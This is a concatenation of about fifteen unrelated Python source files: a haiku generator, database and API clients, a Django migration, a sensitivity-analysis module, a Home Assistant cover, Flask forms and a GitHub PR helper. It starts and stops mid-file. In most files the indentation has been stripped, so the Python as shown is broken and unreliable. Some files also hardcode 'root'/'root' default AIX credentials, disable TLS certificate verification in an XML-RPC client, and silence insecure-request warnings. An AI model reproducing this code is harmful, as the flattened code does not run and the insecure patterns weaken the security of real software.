# generate a full haiku
elif choice == "1":
final = []
end_prev_line = []
first_line, end_prev_line1 = haiku_line(suffix_map_1, suffix_map_2,
corpus, end_prev_line, 5)
final.append(first_line)
line, end_prev_line2 = haiku_line(suffix_map_1, suffix_map_2,
corpus, end_prev_line1, 7)
final.append(line)
line, end_prev_line3 = haiku_line(suffix_map_1, suffix_map_2,
corpus, end_prev_line2, 5)
final.append(line)
# regenerate line 2
elif choice == "2":
if not final:
print("Please generate a full haiku first (Option 1).")
continue
else:
line, end_prev_line2 = haiku_line(suffix_map_1, suffix_map_2,
corpus, end_prev_line1, 7)
final[1] = line
# regenerate line 3
elif choice == "3":
if not final:
print("Please generate a full haiku first (Option 1).")
continue
else:
line, end_prev_line3 = haiku_line(suffix_map_1, suffix_map_2,
corpus, end_prev_line2, 5)
final[2] = line
# some unknown choice
else:
print("\nSorry, but that isn't a valid choice.", file=sys.stderr)
continue
# display results
print()
print("First line = " + ' '.join(final[0]), file=sys.stderr)
print("Second line = " + ' '.join(final[1]), file=sys.stderr)
print("Third line = " + ' '.join(final[2]), file=sys.stderr)
print()
input("\n\nPress the Enter key to exit.")
if __name__ == '__main__':
main()
|
"""A pub/sub Bus for managing states and transitions.
The 'process' subpackage defines a ProcessBus object, which is used to
connect applications, servers, and frameworks with site-wide services
such as daemonization, process reload, signal handling, drop privileges,
PID file management, logging for all of these, and many more.
The 'plugins' subpackage defines a few abstract and concrete services for
use with a Bus. Some use custom channels; see the documentation for each class.
"""
from magicbus.base import ChannelFailures
try:
from magicbus.win32 import Win32Bus as Bus, Win32ProcessBus as ProcessBus
except ImportError:
from magicbus.base import Bus
from magicbus.process import ProcessBus
bus = ProcessBus()
__all__ = ['ChannelFailures', 'Bus', 'ProcessBus', 'bus']
|
#
# Copyright (C) 2021 Vaticle
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from abc import ABC
from typing import TYPE_CHECKING, Union
import typedb_protocol.common.transaction_pb2 as transaction_proto
from typedb.api.concept.type.type import Type, RemoteType
from typedb.common.exception import TypeDBClientException, MISSING_LABEL, MISSING_TRANSACTION
from typedb.common.label import Label
from typedb.common.rpc.request_builder import type_set_label_req, type_is_abstract_req, type_get_supertype_req, \
type_get_supertypes_req, type_get_subtypes_req, type_delete_req
from typedb.concept.concept import _Concept, _RemoteConcept
from typedb.concept.proto import concept_proto_reader
if TYPE_CHECKING:
from typedb.api.connection.transaction import TypeDBTransaction, _TypeDBTransactionExtended
class _Type(Type, _Concept, ABC):
def __init__(self, label: Label, is_root: bool):
if not label:
raise TypeDBClientException.of(MISSING_LABEL)
self._label = label
self._is_root = is_root
self._hash = hash(label)
def get_label(self):
return self._label
def is_root(self):
return self._is_root
def as_type(self) -> "Type":
return self
def __str__(self):
return type(self).__name__ + "[label: %s]" % self.get_label()
def __eq__(self, other):
if other is self:
return True
if not other or type(self) != type(other):
return False
return self.get_label() == other.get_label()
def __hash__(self):
return self._hash
class _RemoteType(RemoteType, _RemoteConcept, ABC):
def __init__(self, transaction: Union["_TypeDBTransactionExtended", "TypeDBTransaction"], label: Label, is_root: bool):
if not transaction:
raise TypeDBClientException.of(MISSING_TRANSACTION)
if not label:
raise TypeDBClientException.of(MISSING_LABEL)
self._transaction_ext = transaction
self._label = label
self._is_root = is_root
self._hash = hash((self._transaction_ext, label))
def get_label(self):
return self._label
def is_root(self):
return self._is_root
def as_type(self) -> "RemoteType":
return self
def set_label(self, new_label: str):
self.execute(type_set_label_req(self.get_label(), new_label))
self._label = new_label
self._hash = hash((self._transaction_ext, new_label))
def is_abstract(self):
return self.execute(type_is_abstract_req(self.get_label())).type_is_abstract_res.abstract
def get_supertype(self):
res = self.execute(type_get_supertype_req(self.get_label())).type_get_supertype_res
return concept_proto_reader.type_(res.type) if res.WhichOneof("res") == "type" else None
def get_supertypes(self):
return (concept_proto_reader.type_(t) for rp in self.stream(type_get_supertypes_req(self.get_label())) for t in rp.type_get_supertypes_res_part.types)
def get_subtypes(self):
return (concept_proto_reader.type_(t) for rp in self.stream(type_get_subtypes_req(self.get_label())) for t in rp.type_get_subtypes_res_part.types)
def delete(self):
self.execute(type_delete_req(self.get_label()))
def execute(self, request: transaction_proto.Transaction.Req):
return self._transaction_ext.execute(request).type_res
def stream(self, request: transaction_proto.Transaction.Req):
return (rp.type_res_part for rp in self._transaction_ext.stream(request))
def __str__(self):
return type(self).__name__ + "[label: %s]" % self.get_label()
def __eq__(self, other):
if other is self:
return True
if not other or type(self) != type(other):
return False
return self._transaction_ext is other._transaction_ext and self.get_label() == other.get_label()
def __hash__(self):
return self._hash
|
#!/usr/bin/env python3
# coding: utf8
# Author: Lenz Furrer, 2017
'''
Loaders and formatters for the BeCalm TIPS formats.
'''
import json
import codecs
import logging
from urllib import request as url_request
from .document import Article, Section
from .load import DocIterator
from .export import StreamFormatter
# ======== #
# Loaders. #
# ======== #
class _BeCalmFetcher(DocIterator):
'''
Fetch documents from BeCalm's servers.
'''
domain = None
url = None
textfield = None
def iter_documents(self, source):
'''
Iterate over documents from a BeCalm server.
'''
return self._iter_documents(source)
def _iter_documents(self, docids):
if not isinstance(docids, (tuple, list)):
docids = list(docids)
if not docids:
raise ValueError('Empty doc-ID list.')
query = json.dumps({self.domain: docids}).encode('ascii')
headers = {'Content-Type': 'application/json'}
logging.info("POST request to BeCalm's server with the query %s", query)
req = url_request.Request(self.url, data=query, headers=headers)
with url_request.urlopen(req) as f:
docs = json.load(codecs.getreader('utf-8')(f))
for doc in docs:
yield self._document(doc)
def _document(self, doc):
id_ = doc['externalId']
title = doc['title']
text = doc[self.textfield]
article = Article(id_, tokenizer=self.config.text_processor)
article.add_section('Title', title)
article.add_section('Abstract', text)
return article
class BeCalmAbstractFetcher(_BeCalmFetcher):
'''
Fetch abstracts from BeCalm's abstract server.
'''
domain = 'abstracts'
url = 'http://193.147.85.10:8088/abstractserver/json'
textfield = 'text'
class BeCalmPatentFetcher(_BeCalmFetcher):
'''
Fetch patent abstracts from BeCalm's patent server.
'''
domain = 'patents'
url = 'http://193.147.85.10:8087/patentserver/json'
textfield = 'abstractText'
# =========== #
# Formatters. #
# =========== #
class _BeCalmFormatter(StreamFormatter):
'''
Common basis for BeCalm's specific output formats.
'''
fields = ('document_id', 'section', 'init', 'end', 'score',
'annotated_text', 'type', 'database_id')
@staticmethod
def _iter_entries(content):
'''
Iterate over entries needed for BeCalm's output formats.
'''
for section in content.get_subelements(Section):
article_id = section.article.id_
section_type = 'T' if section.type_.lower() == 'title' else 'A'
for entity in section.iter_entities():
yield (
article_id,
section_type,
entity.start,
entity.end,
0.5, # dummy score
entity.text,
entity.type,
entity.cid,
)
class BeCalmTSVFormatter(_BeCalmFormatter):
'''
BeCalm's TSV format for the TIPS challenge.
'''
ext = 'tsv'
    template = '{}\t{}\t{}\t{}\t{}\t{}\t{}\t{}\n'
def write(self, stream, content):
if self.config.p.include_header:
stream.write(self.template.format(*(f.upper()
for f in self.fields)))
for entry in self._iter_entries(content):
stream.write(self.template.format(*entry))
class BeCalmJSONFormatter(_BeCalmFormatter):
'''
BeCalm's JSON format for the TIPS challenge.
'''
ext = 'json'
def write(self, stream, content):
stream.write('[\n')
need_comma = False # comma needed before all but the first entry
for entry in self._iter_entries(content):
if need_comma:
stream.write(',\n')
else:
need_comma = True
json.dump(dict(zip(self.fields, entry)), stream, indent=4)
stream.write('\n]')
|
#!/usr/bin/env python
#-*- coding: utf-8 -*-
"""
Configuration parameters that an operator would not normally care about are defined here.
Attributes that manual operation also needs, such as IP, username, and password, are passed in through function interfaces instead.
"""
#NIM
NIM_prompt='#'
NIM_port=23
#VIO
#each VIOServer config should be the same
VIOServer_prompt='$'
VIOServer_port=23
#HMC
HMC_prompt='hscroot@localhost:~>'
HMC_port=22
#AIX Common
AIX_TelnetPort=23
AIX_Cmd_prompt='#'
AIX_Default_Username='root'
AIX_Default_Passwd='root'
|
# Generated by Django 3.1.11 on 2021-07-20 08:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('schools', '0006_auto_20210713_1029'),
]
operations = [
migrations.AlterField(
model_name='school',
name='zip_city',
field=models.CharField(blank=True, max_length=15),
),
]
|
import time
import os
# from lucent.optvis.objectives import channel
from lucent.optvis.render import render_vis, tensor_to_img_array
import numpy as np
from PIL import Image
import streamlit as st
import torch
from lucent.interface.utils import join_layer_channel, update_image_db, display_image, init, create_model_list
def update_identifier():
st.session_state.identifier = join_layer_channel(st.session_state.layer, st.session_state.channel)
if 'layer_names' not in st.session_state:
st.session_state['layer_names'] = []
with st.sidebar:
with st.form('config'):
st.write('## Config')
st.selectbox(
'Model',
options=create_model_list(),
key='model_name',
index=0,
)
st.text_input('Data directory', value='/home/aric/Pictures/', key='datadir')
st.checkbox('Load images from data dir', value=True, key='load_data')
submitted = st.form_submit_button("Save config")
if submitted:
print(f'\n{st.session_state.layer = }, {st.session_state.channel = }\n')
st.session_state.model = init(st.session_state.model_name)
st.write('Config saved!')
    # this should accept a 'disabled' keyword but doesn't yet; the code on GitHub may not have been released to the package index yet
st.checkbox("Save images to data dir (won't work if loading images)", value=False, key='save_data')
st.selectbox('layer', options=st.session_state.layer_names, key='layer', on_change=update_identifier, index=0)
st.text_input('channel', value='1', key='channel', on_change=update_identifier)
# init and update data base of features
if 'database' not in st.session_state:
st.session_state['database'] = dict()
# init identifier
if 'identifier' not in st.session_state:
st.session_state['identifier'] = None
if 'model' not in st.session_state:
st.session_state['model'] = None
if 'layer' not in st.session_state:
st.session_state['layer'] = None
if st.session_state.load_data:
update_image_db(st.session_state.datadir, st.session_state.model_name)
st.button('Generate/Load image', on_click=display_image, args=(st.session_state.model, st.session_state.identifier,))
|
from __future__ import division
from __future__ import print_function
from scipy.stats import norm
import numpy as np
from . import common_args
from ..util import read_param_file
def analyze(problem, X, Y, num_resamples=1000,
conf_level=0.95, print_to_console=False):
"""Calculates Derivative-based Global Sensitivity Measure on model outputs.
Returns a dictionary with keys 'vi', 'vi_std', 'dgsm', and 'dgsm_conf',
where each entry is a list of size D (the number of parameters) containing
the indices in the same order as the parameter file.
Parameters
----------
problem : dict
The problem definition
X : numpy.matrix
The NumPy matrix containing the model inputs
Y : numpy.array
The NumPy array containing the model outputs
num_resamples : int
The number of resamples used to compute the confidence
intervals (default 1000)
conf_level : float
The confidence interval level (default 0.95)
print_to_console : bool
Print results directly to console (default False)
References
----------
.. [1] Sobol, I. M. and S. Kucherenko (2009). "Derivative based global
sensitivity measures and their link with global sensitivity
indices." Mathematics and Computers in Simulation, 79(10):3009-3017,
doi:10.1016/j.matcom.2009.01.023.
"""
D = problem['num_vars']
if Y.size % (D + 1) == 0:
N = int(Y.size / (D + 1))
else:
raise RuntimeError("Incorrect number of samples in model output file.")
if not 0 < conf_level < 1:
raise RuntimeError("Confidence level must be between 0-1.")
base = np.zeros(N)
X_base = np.zeros((N, D))
perturbed = np.zeros((N, D))
X_perturbed = np.zeros((N, D))
step = D + 1
base = Y[0:Y.size:step]
X_base = X[0:Y.size:step, :]
for j in range(D):
perturbed[:, j] = Y[(j + 1):Y.size:step]
X_perturbed[:, j] = X[(j + 1):Y.size:step, j]
# First order (+conf.) and Total order (+conf.)
keys = ('vi', 'vi_std', 'dgsm', 'dgsm_conf')
S = dict((k, np.zeros(D)) for k in keys)
if print_to_console:
print("Parameter %s %s %s %s" % keys)
for j in range(D):
S['vi'][j], S['vi_std'][j] = calc_vi(
base, perturbed[:, j], X_perturbed[:, j] - X_base[:, j])
S['dgsm'][j], S['dgsm_conf'][j] = calc_dgsm(base, perturbed[:, j], X_perturbed[
:, j] - X_base[:, j], problem['bounds'][j], num_resamples, conf_level)
if print_to_console:
print("%s %f %f %f %f" % (
problem['names'][j], S['vi'][j], S['vi_std'][j], S['dgsm'][j], S['dgsm_conf'][j]))
return S
def calc_vi(base, perturbed, x_delta):
# v_i sensitivity measure following Sobol and Kucherenko (2009)
# For comparison, Morris mu* < sqrt(v_i)
dfdx = (perturbed - base) / x_delta
dfdx2 = dfdx ** 2
return np.mean(dfdx2), np.std(dfdx2)
def calc_dgsm(base, perturbed, x_delta, bounds, num_resamples, conf_level):
# v_i sensitivity measure following Sobol and Kucherenko (2009)
# For comparison, total order S_tot <= dgsm
D = np.var(base)
vi, _ = calc_vi(base, perturbed, x_delta)
dgsm = vi * (bounds[1] - bounds[0]) ** 2 / (D * np.pi ** 2)
s = np.zeros(num_resamples)
for i in range(num_resamples):
r = np.random.randint(len(base), size=len(base))
s[i], _ = calc_vi(base[r], perturbed[r], x_delta[r])
return dgsm, norm.ppf(0.5 + conf_level / 2) * s.std(ddof=1)
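# A minimal sketch (synthetic data, not an official SALib example) of calling
# analyze() directly; it assumes the radial sample layout expected above: for each
# of N blocks, one base row followed by D rows, each perturbing one input.
def _example_usage():
    problem = {'num_vars': 2, 'names': ['x1', 'x2'], 'bounds': [[0.0, 1.0], [0.0, 1.0]]}
    N, D = 50, 2
    rng = np.random.RandomState(0)
    X = np.zeros((N * (D + 1), D))
    for i in range(N):
        base_row = rng.rand(D)
        X[i * (D + 1)] = base_row
        for j in range(D):
            perturbed_row = base_row.copy()
            perturbed_row[j] += 0.01  # small finite-difference step
            X[i * (D + 1) + 1 + j] = perturbed_row
    Y = np.sum(X ** 2, axis=1)  # toy model output
    return analyze(problem, X, Y, num_resamples=100)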
if __name__ == "__main__":
parser = common_args.create()
parser.add_argument('-X', '--model-input-file', type=str,
required=True, default=None, help='Model input file')
parser.add_argument('-r', '--resamples', type=int, required=False, default=1000,
help='Number of bootstrap resamples for Sobol confidence intervals')
args = parser.parse_args()
problem = read_param_file(args.paramfile)
Y = np.loadtxt(args.model_output_file, delimiter=args.delimiter, usecols=(args.column,))
X = np.loadtxt(args.model_input_file, delimiter=args.delimiter, ndmin=2)
if len(X.shape) == 1:
X = X.reshape((len(X), 1))
analyze(problem, X, Y, num_resamples=args.resamples, print_to_console=True)
|
'''
144. Binary Tree Preorder Traversal Easy
Given the root of a binary tree, return the preorder traversal of its nodes' values.
Example 1:
Input: root = [1,null,2,3]
Output: [1,2,3]
Example 2:
Input: root = []
Output: []
Example 3:
Input: root = [1]
Output: [1]
Example 4:
Input: root = [1,2]
Output: [1,2]
Example 5:
Input: root = [1,null,2]
Output: [1,2]
Constraints:
The number of nodes in the tree is in the range [0, 100].
-100 <= Node.val <= 100
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
from typing import List
class Solution:
def preorderTraversal(self, root: TreeNode) -> List[int]:
self.ans = []
#self.recursive(root)
self.iterative(root)
return self.ans
def recursive(self, node):
if not node:
return
self.ans.append(node.val)
self.recursive(node.left)
self.recursive(node.right)
def iterative(self, root):
stack = [(root, False)]
        while stack:
            node, visited = stack.pop()
            if node:
                if visited:
self.ans.append(node.val)
else:
# Note: Right leaf first due to using a stack
# Preorder, Root, left, right
stack.append((node.right, False))
stack.append((node.left, False))
stack.append((node, True))
|
# -*- coding: utf-8 -*-
import aiohttp
from aiohttp import web
import argparse
import asyncio
import concurrent.futures
import io
import os
from .data import Data
# Local resources
HERE = os.path.dirname(os.path.realpath(__file__))
INDEX_HTML = os.path.join(HERE, 'index.html')
D3_JS = os.path.join(HERE, 'd3.v4.min.js')
# Handler factory for static files
def static_handler(path):
async def handler(request):
return web.FileResponse(path)
return handler
# Acquire sample
async def get_api_annotation(request):
data = request.app['data']
payload = await data.get_next_sample()
return web.json_response(payload)
# Save annotation result
async def post_api_annotation(request):
data = request.app['data']
payload = await request.json()
result = await data.add_annotation(payload)
return web.json_response(result)
# Run service
def run(host, port, metadata_path, image_folder, annotation_path):
with concurrent.futures.ThreadPoolExecutor(max_workers=4) as executor:
# Create application
app = web.Application()
app.add_routes([
web.get('/', static_handler(INDEX_HTML)),
web.get('/d3.v4.min.js', static_handler(D3_JS)),
web.get('/api/annotation', get_api_annotation),
web.post('/api/annotation', post_api_annotation)
])
app['executor'] = executor
app['data'] = Data(metadata_path, image_folder, annotation_path, executor)
app['annotation_path'] = annotation_path
# Start server
runner = web.AppRunner(app)
loop = asyncio.get_event_loop()
async def start():
await runner.setup()
site = web.TCPSite(runner, host, port)
await site.start()
loop.run_until_complete(start())
print(f'Running on {host}:{port}')
# Run forever (hack to avoid blocking select on Windows with default loop)
async def foo():
while True:
await asyncio.sleep(1.0)
try:
loop.run_until_complete(foo())
except KeyboardInterrupt:
pass
# Cleanup
loop.run_until_complete(runner.cleanup())
# Standalone usage
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Box annotator service')
parser.add_argument('-H', '--host', nargs='?', default='0.0.0.0', help='Host address bound')
parser.add_argument('-P', '--port', nargs='?', type=int, default=80, help='Port used')
parser.add_argument('-M', '--metadata', nargs='?', default='./metadata.json', help='Metadata file')
parser.add_argument('-I', '--images', nargs='?', default='./images/', help='Image folder')
parser.add_argument('-A', '--annotation', nargs='?', default='./annotation.json', help='Annotation file')
args = parser.parse_args()
run(args.host, args.port, args.metadata, args.images, args.annotation)
|
from __future__ import absolute_import
from __future__ import print_function
import veriloggen.core.vtypes as vtypes
import veriloggen.core.module as module
def mkMultiplierCore(index, lwidth=32, rwidth=32, lsigned=True, rsigned=True, depth=6):
if lwidth <= 0:
raise ValueError("data width must be greater than 0.")
if rwidth <= 0:
raise ValueError("data width must be greater than 0.")
if depth < 2:
raise ValueError("depth must be greater than 1.")
retwidth = lwidth + rwidth
m = module.Module('multiplier_core_%d' % index)
clk = m.Input('CLK')
update = m.Input('update')
a = m.Input('a', lwidth)
b = m.Input('b', rwidth)
c = m.Output('c', retwidth)
_a = m.Reg('_a', lwidth, signed=lsigned)
_b = m.Reg('_b', rwidth, signed=rsigned)
_mul = m.Wire('_mul', retwidth, signed=True)
_pipe_mul = [m.Reg('_pipe_mul%d' % i, retwidth, signed=True)
for i in range(depth - 1)]
__a = _a
__b = _b
if not lsigned:
__a = vtypes.SystemTask(
'signed', vtypes.Cat(vtypes.Int(0, width=1), _a))
if not rsigned:
__b = vtypes.SystemTask(
'signed', vtypes.Cat(vtypes.Int(0, width=1), _b))
m.Assign(_mul(__a * __b))
m.Assign(c(_pipe_mul[depth - 2]))
m.Always(vtypes.Posedge(clk))(
vtypes.If(update)(
_a(a),
_b(b),
_pipe_mul[0](_mul),
[_pipe_mul[i](_pipe_mul[i - 1]) for i in range(1, depth - 1)]
))
return m
def mkMultiplier(index, lwidth=32, rwidth=32, lsigned=True, rsigned=True, depth=6):
if lwidth <= 0:
raise ValueError("data width must be greater than 0.")
if rwidth <= 0:
raise ValueError("data width must be greater than 0.")
if depth < 2:
raise ValueError("depth must be greater than 1.")
retwidth = lwidth + rwidth
mult = mkMultiplierCore(index, lwidth, rwidth, lsigned, rsigned, depth)
m = module.Module('multiplier_%d' % index)
clk = m.Input('CLK')
rst = m.Input('RST')
update = m.Input('update')
enable = m.Input('enable')
valid = m.Output('valid')
a = m.Input('a', lwidth)
b = m.Input('b', rwidth)
c = m.Output('c', retwidth)
valid_reg = [m.Reg('valid_reg%d' % i) for i in range(depth)]
m.Assign(valid(valid_reg[depth - 1]))
m.Always(vtypes.Posedge(clk))(
vtypes.If(rst)(
[valid_reg[i](0) for i in range(depth)]
).Else(
vtypes.If(update)(
valid_reg[0](enable),
[valid_reg[i](valid_reg[i - 1]) for i in range(1, depth)]
)
))
ports = [('CLK', clk), ('update', update), ('a', a), ('b', b), ('c', c)]
m.Instance(mult, 'mult', ports=ports)
return m
# global multiplier count
index_count = 0
def get_mul(lwidth=32, rwidth=32, lsigned=True, rsigned=True, depth=6):
global index_count
mul = mkMultiplier(index_count, lwidth, rwidth, lsigned, rsigned, depth)
index_count += 1
return mul
def reset():
global index_count
index_count = 0
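# A small usage sketch (assuming veriloggen's Module.to_verilog() API) that builds a
# pipelined multiplier and prints the generated Verilog source.
if __name__ == '__main__':
    mul = get_mul(lwidth=16, rwidth=16, depth=4)
    print(mul.to_verilog())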
|
#!/usr/bin/python
import wgdata
from wvtest import wvtest
@wvtest.wvtest
def EaterTest():
e = wgdata.Eater('abcdefg')
wvtest.WVPASSEQ(e.Eat(2), 'ab')
wvtest.WVEXCEPT(wgdata.DecodeError, e.Eat, 10)
wvtest.WVPASSEQ(e.Unpack('!3s'), ('cde',))
wvtest.WVPASSEQ(e.Remainder(), 'fg')
wvtest.WVPASSEQ(e.Remainder(), '')
e = wgdata.Eater('\x01\x02\x03\x04\x05\x06')
wvtest.WVPASSEQ(list(e.Iter('!H', 4)), [(0x0102,), (0x0304,)])
wvtest.WVPASSEQ(list(e.Iter('!B', 1)), [(0x05,)])
wvtest.WVEXCEPT(wgdata.DecodeError, lambda: list(e.Iter('!B', 2)))
wvtest.WVPASSEQ(e.Remainder(), '\x06')
if __name__ == '__main__':
wvtest.wvtest_main()
|
import hashlib
import os
import logging
import sys
import xmlrpclib
import ssl
class StarfaceConfig():
def __init__(self, file):
self.file = file
self.__items = ['url', 'user', 'password', 'preferred_device']
self.url = None
self.user = None
self.password = None
self.preferred_device = None
self.__load(self.file)
def __load(self, file):
with open(file, 'r') as f:
for item in self.__items:
setattr(self, item, f.readline().rstrip())
index = 0
for item in self.__items[:-1]:
index+=1
if not getattr(self, item):
raise RuntimeError('Config item "{0}" missing (line number {1})'.format(item, index))
class StarfaceCaller():
def __init__(self, url, user, password):
self.url = url
self.user = user
self.password = password
self.proxy = xmlrpclib.ServerProxy(self.uri, verbose=False, use_datetime=True,
context=ssl._create_unverified_context())
@property
def uri(self):
return '{0}/xml-rpc?de.vertico.starface.auth={1}'.format(self.url, self.auth)
@property
def auth(self):
password = hashlib.sha512()
password.update(self.password)
auth = hashlib.sha512()
auth.update(self.user)
auth.update('*')
auth.update(password.hexdigest().lower())
return '{0}:{1}'.format(self.user, auth.hexdigest())
def get_version(self):
return self.proxy.ucp.v30.requests.system.getServerVersion()
def place_call(self, number, preferred_device=''):
login = self.proxy.ucp.v20.server.connection.login()
if login:
self.proxy.ucp.v20.server.communication.call.placeCall(number, preferred_device, '')
self.proxy.ucp.v20.server.connection.logout()
else:
raise RuntimeError('Could not call login on starface')
def main():
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
import argparse
name = os.path.basename(sys.argv[0])
parser = argparse.ArgumentParser(prog=name,
usage='%(prog)s -n +49911777-777 [ -d SIP/dev ] [ -h ]')
parser.add_argument('-n', '--number', dest='number', help='Call number')
parser.add_argument('-d', '--device', dest='device', help='Place call on device, e.g. SIP/mydevice')
parser.add_argument('-c', '--credential', dest='credential', help='Credential file',
default='~/.starface_credentials')
args = parser.parse_args()
if not args.number:
print('{0}: No argument "number" given'.format(name))
parser.print_usage()
return 1
credential = os.path.expanduser(args.credential)
logger.debug('Using credential file %s', credential)
config = StarfaceConfig(credential)
caller = StarfaceCaller(url=config.url, user=config.user, password=config.password)
logger.debug('Starface Version: %s', caller.get_version())
preferred_device = ''
if args.device:
preferred_device = args.device
elif config.preferred_device:
preferred_device = config.preferred_device
caller.place_call(args.number, preferred_device)
    return 0
if __name__ == '__main__':
sys.exit(main())
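# A small sketch (Python 3 style, assuming UTF-8 encoding) of the same authentication
# token scheme used by StarfaceCaller.auth above:
# "<user>:sha512(<user> + '*' + sha512(<password>).hexdigest().lower()).hexdigest()".
def build_auth_token_py3(user, password):
    pw_hash = hashlib.sha512(password.encode('utf-8')).hexdigest().lower()
    token = hashlib.sha512((user + '*' + pw_hash).encode('utf-8')).hexdigest()
    return '{0}:{1}'.format(user, token)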
|
"""Support for Freedompro cover."""
import json
from pyfreedompro import put_state
from homeassistant.components.cover import (
ATTR_POSITION,
CoverDeviceClass,
CoverEntity,
CoverEntityFeature,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers import aiohttp_client
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from .const import DOMAIN
DEVICE_CLASS_MAP = {
"windowCovering": CoverDeviceClass.BLIND,
"gate": CoverDeviceClass.GATE,
"garageDoor": CoverDeviceClass.GARAGE,
"door": CoverDeviceClass.DOOR,
"window": CoverDeviceClass.WINDOW,
}
SUPPORTED_SENSORS = {"windowCovering", "gate", "garageDoor", "door", "window"}
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up Freedompro cover."""
api_key = entry.data[CONF_API_KEY]
coordinator = hass.data[DOMAIN][entry.entry_id]
async_add_entities(
Device(hass, api_key, device, coordinator)
for device in coordinator.data
if device["type"] in SUPPORTED_SENSORS
)
class Device(CoordinatorEntity, CoverEntity):
"""Representation of an Freedompro cover."""
def __init__(self, hass, api_key, device, coordinator):
"""Initialize the Freedompro cover."""
super().__init__(coordinator)
self._session = aiohttp_client.async_get_clientsession(hass)
self._api_key = api_key
self._attr_name = device["name"]
self._attr_unique_id = device["uid"]
self._attr_device_info = DeviceInfo(
identifiers={
(DOMAIN, self.unique_id),
},
manufacturer="Freedompro",
model=device["type"],
name=self.name,
)
self._attr_current_cover_position = 0
self._attr_is_closed = True
self._attr_supported_features = (
CoverEntityFeature.CLOSE
| CoverEntityFeature.OPEN
| CoverEntityFeature.SET_POSITION
)
self._attr_device_class = DEVICE_CLASS_MAP[device["type"]]
@callback
def _handle_coordinator_update(self) -> None:
"""Handle updated data from the coordinator."""
device = next(
(
device
for device in self.coordinator.data
if device["uid"] == self.unique_id
),
None,
)
if device is not None and "state" in device:
state = device["state"]
if "position" in state:
self._attr_current_cover_position = state["position"]
if self._attr_current_cover_position == 0:
self._attr_is_closed = True
else:
self._attr_is_closed = False
super()._handle_coordinator_update()
async def async_added_to_hass(self) -> None:
"""When entity is added to hass."""
await super().async_added_to_hass()
self._handle_coordinator_update()
async def async_open_cover(self, **kwargs):
"""Open the cover."""
await self.async_set_cover_position(position=100)
async def async_close_cover(self, **kwargs):
"""Close the cover."""
await self.async_set_cover_position(position=0)
async def async_set_cover_position(self, **kwargs):
"""Async function to set position to cover."""
payload = {}
payload["position"] = kwargs[ATTR_POSITION]
payload = json.dumps(payload)
await put_state(
self._session,
self._api_key,
self.unique_id,
payload,
)
await self.coordinator.async_request_refresh()
|
from flask_wtf import FlaskForm
from wtforms import StringField
from wtforms import validators
class UserSignupForm(FlaskForm):
username = StringField('username', default="username *", validators=[validators.DataRequired()])
email = StringField("email", default="your@email.com *", validators=[validators.Email(message="Please enter a valid email")])
password = StringField('password', default="password *", validators=[validators.DataRequired()])
password_confirm = StringField('confirm', default="confirm *", validators=[validators.DataRequired()])
class UserLoginForm(FlaskForm):
username = StringField('username', validators=[validators.DataRequired()])
password = StringField('password', validators=[validators.DataRequired()])
class UserForm(FlaskForm):
username = StringField('username', validators=[validators.DataRequired()])
email = StringField("email", validators=[validators.Email(message="Please enter a valid email")])
    image_url = StringField('avatar (URL)', validators=[validators.DataRequired()])
|
#!/usr/bin/env python3
import argparse
import os
import sys
import re
import json
import base64
import urllib3
from github import Github
from github.PullRequest import PullRequest
from github.Repository import Repository
from github.ContentFile import ContentFile
from github.Branch import Branch
from utils import load_json, CONTENT_ROOT_PATH, timestamped_print
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
print = timestamped_print
METADATA = 'pack_metadata.json'
PACKS = 'Packs'
SUPPORT = 'support'
XSOAR_SUPPORT = 'xsoar'
PACK_NAME_REGEX = re.compile(r'Packs/([A-Za-z0-9-_.]+)/')
def get_metadata_filename_from_pr(pr_files, pack_name) -> str:
""" Iterates over all pr files and return the pr metadata.json filename if exists, else None
Args:
pr_files (PaginatedList[File]): The list of pr files
pack_name (str): The pack name
Returns:
The pr metadata.json filename if exists, else None
"""
pack_metadata_path = os.path.join(PACKS, pack_name, METADATA)
print(f'Searching for a {pack_metadata_path} file in the PR.')
for file in pr_files:
if pack_metadata_path in file.filename:
print(f'Found {METADATA} file in PR for pack {pack_name}: {file.filename}.')
return file.filename
print(f'Did not find a {pack_metadata_path} file in the PR.')
return ''
def get_pack_support_type_from_pr_metadata_file(pr_metadata_filename: str, pr: PullRequest):
""" Retrieves the support type from the pr metadata.json file
Args:
pr_metadata_filename: The pr metadata.json filename
pr: The pr
Returns:
The support type
"""
print(f'Getting support type from {pr_metadata_filename}.')
_, branch_name = pr.head.label.split(':')
print(f'Branch name is: {branch_name}')
contributor_repo: Repository = pr.head.repo
branch: Branch = contributor_repo.get_branch(branch=branch_name)
metadata_file: ContentFile = contributor_repo.get_contents(path=pr_metadata_filename, ref=branch.commit.sha)
metadata_file_content: dict = json.loads(base64.b64decode(metadata_file.content))
return metadata_file_content.get(SUPPORT)
def get_pack_names_from_pr(pr_files) -> set:
""" Extracts the pack names from the pr files
Args:
pr_files (PaginatedList[File]): The list of pr files
Returns:
The set of pack names
"""
pack_names = set()
for file in pr_files:
if PACKS in file.filename:
pack_names.add(re.findall(PACK_NAME_REGEX, file.filename)[0])
if not pack_names:
        raise Exception('PR does not contain files prefixed with "Packs".')
return pack_names
def get_pack_support_type_from_repo_metadata_file(pack_name):
""" Retrieves the support type from the repo metadata.json file
Args:
pack_name (str): The pack name
Returns:
The support type
"""
print('Getting support type from the repo.')
